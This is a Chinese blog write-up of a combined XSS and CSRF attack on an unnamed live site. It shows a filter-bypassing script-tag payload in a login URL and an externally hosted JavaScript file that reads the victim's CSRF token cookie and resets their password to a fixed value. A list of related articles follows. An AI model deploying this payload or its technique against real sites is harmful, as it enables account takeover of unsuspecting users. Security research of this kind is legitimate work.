xss+csrf组合拳这么玩

最新推荐文章于 2024-06-05 18:55:21 发布
最新推荐文章于 2024-06-05 18:55:21 发布
阅读量894 收藏 4
点赞数
分类专栏: # 挖掘技巧 # tips 文章标签: xss csrf 前端

这个站同样没发现什么大的问题,这也是最近几天第三次挖掘该站了,在网站的各个地方输出都做了转义,一般来说并不会出现XSS,不过今天测试时开了两个浏览器窗口,当我在其中一个窗口重置密码时,发现另一个窗口出现了弹窗提示

看到url和提示框中一致的id时觉得这里大有文章可做

测试下特殊符号,发现这里输出同样也会转义

一般到此可能就会放弃了,不过幸好我随手多试了一下,发现一个完整的标签竟然没有转义

然后很快的输入弹窗payload

<img src=x onerror='alert(1)'>

发现直接被过滤了

继续盲测,也很简单就饶了过去,用script标签

另外在该网站有一处设计缺陷,便是手机注册的用户默认都没有密码,而且在个人中心可以直接设置新密码,当然有csrf_token保护,所以不能csrf攻击,不过结合XSS的话便可以直接修改他人密码了

在用xss构造修改密码的表单时,用script src指向外部js文件更加方便,但是发现依旧和之前过滤img src=x的情况一样,前端显示undefined,后面发现是是自己疏忽了,等号url编码后即可

<script src%3d"xxx"></script>

最后poc,打开即可修改密码为Aa123456

https://xxxx/login?userId=%3Cscript%20src%3d%22https://l3yx.github.io/resource/vul.js?123123%22%3E%3C/script%3E

vul.js

function getcookie(objname){
    var arrstr = document.cookie.split("; ");
    for(var i = 0;i < arrstr.length;i ++){
    var temp = arrstr[i].split("=");
        if(temp[0] == objname) return unescape(temp[1]);
    }    
}

var csrf_token=getcookie("csrf_token");
if(!csrf_token){
    csrf_token=""
}

var xmlhttp;
if (window.XMLHttpRequest){
    xmlhttp=new XMLHttpRequest();
}
else{
    xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}

xmlhttp.open("POST","/api/user/set_password",true);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("csrf_token="+csrf_token+"&current=&password=Aa123456&confirm=Aa123456");

yggcwhat
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss+csrf组合
wo41ge的博客
12-16 3127
今天 就把之前学的东西简单的总结一下吧 【第一拳】存储型 XSS + CSRF
csrf+xss组合拳攻击
qq_52696043的博客
04-11 633
scrf是一个1click的漏洞,需要用户做一次操作,而通过存储式xss即可实现0click的攻击,通过用户让的浏览器自动访问目标所实现修复验证Referer头,通过添加信任的Re头来规避scrf。
XSS+CSRF组合
weixin_50464560的博客
03-12 2357
0x00 前言 今天学习一下 XSS + CSRF 组合拳,现将笔记记录如下。 0x01 靶场环境 本机(Win):192.168.38.1 DVWA(Win):192.168.38.132 Beef(Kali):192.168.38.129 0x02 组合拳思路 第一拳:存储型 XSS + CSRF(存储型 XSS 攻击代码中加入 CSRF 代码链接) 第二拳:CSRF + SelfXSSCSRF 代码中加入 SelfXSS 代码) 0x03...
2024全网最全面及最新的网络安全技巧 二 之 CSRF+XSS漏洞的各类利用技巧 ———— 作者:LJS
最新发布
weixin_74796680的博客
06-05 927
2024全网最全面及最新的网络安全技巧 二 之 CSRF+XSS漏洞的各类利用技巧
CSRFXSS组合
weixin_60719780的博客
01-17 959
简单的xsscsrf组合利用
学习 xss+csrf 组合
weixin_67259816的博客
05-28 2895
该篇文章记录了xss+csrf组合拳,无论是存储型xss还是反射型xsscsrf结合在一块,都会有一个更强大的收获。
XSS漏洞的利用
LizePing_的博客
07-29 4711
XSS的利用利用XSS窃取cookieXSS修改网页XSS获取用户信息XSS+CSRF 组合拳盲打XSS(Blind XSS)利用开启HttpOnly下的利用1.phpinfo页2.框架钓鱼3.跳转钓鱼4.历史密码5.获取源码6.通过xss伪造oauth等授权请求,远程登录其它 利用XSS窃取cookie 窃取cookie是xss利用最常见的手段,攻击者有了cookie就相当于拥有了“管理员”身份。 通常需要配合xss平台来进行攻击,当被攻击者访问到有恶意代码的页面,他的cookie就会被发送到xss平台。
xss结合csrf实验】
一纸荒芜的博客
09-07 1781
通常xss漏洞可以和csrf漏洞结合使用,今天就做一个小的实验举例,漏洞主要利用的是用户修改敏感信息的未退出状态,并且修改信息不需要验证时很容易被伪造,当我们发现存在csrf漏洞时,可构造url请求信息,配合xss漏洞去配合诱导访问。本实验由本地搭建的pikachu靶场做演示。 本期简单介绍了xss漏洞与csrf漏洞的配合使用。
跨站攻击(XSS+CSRF).docx
01-05
1. 能理解XSS注入原理; 2. 能应用Low等级、Medium等级、High级别的XSS; 3. 能理解XSS的修复。 4. 能从攻击者角度、受害者角度描述CSRF; 5. 能应用Low等级、Medium等级的CSRF实现; 6. 能摸索High级别的CSRF实现;...
xss+csrf+html练习源码.rar_XSS_csrf_csrf源码_xss源码_xss练习源码
09-20
这个“xss+csrf+html练习源码.rar”文件提供了针对这些漏洞的实战练习,帮助安全研究人员或开发者加深对这些威胁的理解和防御能力。 XSS攻击主要分为反射型、存储型和DOM型三种类型。反射型XSS发生在用户点击链接...
详解XSSCSRF简述及预防措施
10-17
主要介绍了XSSCSRF简述及预防措施,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
XSSCSRF两种跨站攻击总结
02-26
但是,历史同样悠久的XSSCSRF却没有远离我们。由于之前已经对XSS很熟悉了,所以我对用户输入的数据一直非常小心。如果输入的时候没有经过Tidy之类的过滤,我一定会在模板输出时候全部转义。所以个人感觉,要避免...
TokenBasedUnsafe:一个展示XSSCSRF攻击的网站
05-14
使用JSON Web令牌(JWT)的基于令牌的用户身份验证。 使用RSA算法对JWT中的数据进行加密和解密。 后端是使用nodejs和expressjs构建的。 前端是使用带有React钩子的... Webiste演示了XSSCSRF攻击是如何发生的。
CSRF+XSS组合拳实战
yuan_boss的博客
08-28 1627
由于CSRF利用条件比较苛刻,需要受害者点击恶意请求。因此我们可需要借助XSS来扩大危害,借用XSS漏洞执行JS代码,让JS直接发起请求,从而不需要让受害者点击恶意请求了。在实战中,如果我们发现了XSS存储型漏洞,我们也可以尝试寻找CSRF漏洞,进而扩大危害。
CSRFXSS组合拳演示
bring_coco的博客
12-14 1589
一.存储型XSSCSRF(在存储型xss中加入CSRF) 1.配置代理 2.打开CSRFTester工具 3.抓取流量 注意:Form Parameters需要将左面的两行复制过去可修改,第二个红箭头的勾选最好去掉,因为有时候自动生成的poc不能用,需要做一些更改,最后点击Generate HTML进行保存至自定义目录下,名称csrf5.html 4.查看代码把容易被人发现的代码去掉 将两个圈的地方去掉,将红箭头那两行必须value值相等 更改完成一半,还需要一句更改密码 CSRF代码成功
CSRF+Self XSS
newlife1441的博客
08-16 580
CSRF,跨站请求攻击,简单地说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并运行一些操作(如发邮件,发消息,甚至财产操作如转账和购买商品)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去运行。。防御原理:由于服务端没有对客户端进行身份校验,所以我们可以通过添加令牌token、验证码等方法来防御csrfCSRF 利用的是网站对用户浏览器的信任。Self XSS,自己输入xss脚本,输出仅自己看到,仅xss。............
pikachu-csrf,结合存储型xss的利用
weixin_43995159的博客
02-11 247
pikachu靶场的三道csrf题目,给出了一些结合存储型xss绕过token检测的思路
详解XSSCSRF
sanlyshi's front-end road
10-28 1742
https://www.cnblogs.com/zhouyyBlog/p/14505961.html
XSS攻击+CSRF攻击
weixin_34198583的博客
08-29 207
XSS攻击 一旦在DOM解析过程成出现不在预期内的改变(JS代码执行或样式大量变化时),就可能发生XSS攻击 XSS分为反射型XSS,存储型XSS和DOM XSS 反射型XSS是在将XSS代码放在URL中,将参数提交到服务器。服务器解析后响应,在响应结果中存在XSS代码,最终通过浏览器解析执行。 存储型XSS是将XSS代码存储到服务端(数据库、内存、文件系统等),在下次请求同一个页面时就不需要带...
xss+csrf组合
09-20
XSSCSRF是两种常见的网络安全漏洞。当它们结合在一起时,会构成一种更加危险的攻击方式,被称为"XSS CSRF组合拳"。下面是一种可能的攻击方式: 1. 攻击者在恶意网站B中插入CSRF payload,并使用该CSRF payload修改用户在A网站的昵称为XSS payload。 2. 攻击者诱使用户访问恶意网站B,触发CSRF payload,导致用户在A网站的昵称被修改为XSS payload。 3. 当用户重新访问A网站时,XSS payload会被触发,从而获取到用户的Cookie信息。 为了防御这种攻击,可以采取以下措施: 1. 在服务端对用户输入进行严格的过滤和验证,特别是在对用户输入进行展示的地方,避免将用户输入作为代码执行。 2. 对于敏感操作,使用CSRF Token来验证请求的合法性。确保每个请求都包含一个随机生成的Token,并在服务端验证该Token的有效性。 3. 在Cookie中使用HttpOnly属性,以防止JavaScript通过document.cookie来获取Cookie信息。 4. 设置合适的Content Security Policy (CSP)来限制页面中可以加载的资源和代码。 以上是一种常见的XSS CSRF组合拳攻击方式以及相应的防御措施,但仍然有其他的攻击方式和防御策略。建议综合使用多种防御措施以提高系统的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值